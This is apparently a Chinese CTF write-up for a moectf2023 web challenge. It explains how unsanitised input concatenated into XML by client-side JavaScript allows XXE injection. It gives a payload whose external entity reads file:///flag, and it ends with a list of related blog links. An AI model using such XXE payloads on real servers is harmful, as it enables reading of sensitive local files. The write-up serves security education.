moectf2023-了解你的座驾-胎教版wp

  • 1.进入题目环境后,点击左侧即可选择展示的内容
  • 2.点击最后一个标签显示:
  • 3.看到提示flag在根目录下,先做源码审计
js 复制代码
function submitForm(name) {
			var form = document.createElement("form");
			form.method = "post";
			form.action = "index.php";

			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";

			form.appendChild(input);
			document.body.appendChild(form);
			form.submit();
		}
  • 发现源码中的js部分处理时存在XXE漏洞:
js 复制代码
			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";
  • 所谓XXE即xml外部实体注入,通过自定义外部实体并使用来读取文件或进行SSRF攻击。在这里参数name被直接插入到xml结构当中,没有做任何过滤,因此可以进行XXE攻击,payload如下:
    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [!ELEMENT name ANY]<!ENTITY xxe SYSTEM "file:///flag" >]><xml><name>&xxe;</name></xml>
相关推荐
数据知道14 分钟前
MongoDB安全加固最佳实践:CIS基准符合性检查与实施步骤
数据库·安全·mongodb
cyforkk1 小时前
数据库里的隐形守卫:通俗易懂理解 RLS(行级安全)
数据库·安全
李子红了时1 小时前
Win10一键禁用自动更新和Windows Defender安全中心
windows·安全
见青..1 小时前
攻防世界-web:php2、easyupload
笔记·安全·题解
艾莉丝努力练剑2 小时前
【MYSQL】MYSQL学习的一大重点:MYSQL数据类型
android·linux·数据库·人工智能·学习·mysql·网络安全
m0_738120722 小时前
渗透测试——Tomato 靶场完整渗透思路(本地文件包含LFI,脏牛提取)
web安全·网络安全·php·安全性测试·webshell·蚁剑
星幻元宇VR2 小时前
VR司法矫正宣教机|智慧法治教育新方式
科技·学习·安全·vr·虚拟现实
数据知道2 小时前
MongoDB网络安全配置:详细讲述IP白名单与防火墙规则
tcp/ip·mongodb·web安全
数据知道3 小时前
MongoDB的Kerberos认证:详细讲述大型企业环境安全集成的实用技术
数据库·安全·mongodb
white-persist4 小时前
【CTF线下赛 AWD】AWD 比赛全维度实战解析:从加固防御到攻击拿旗
网络·数据结构·windows·python·算法·安全·web安全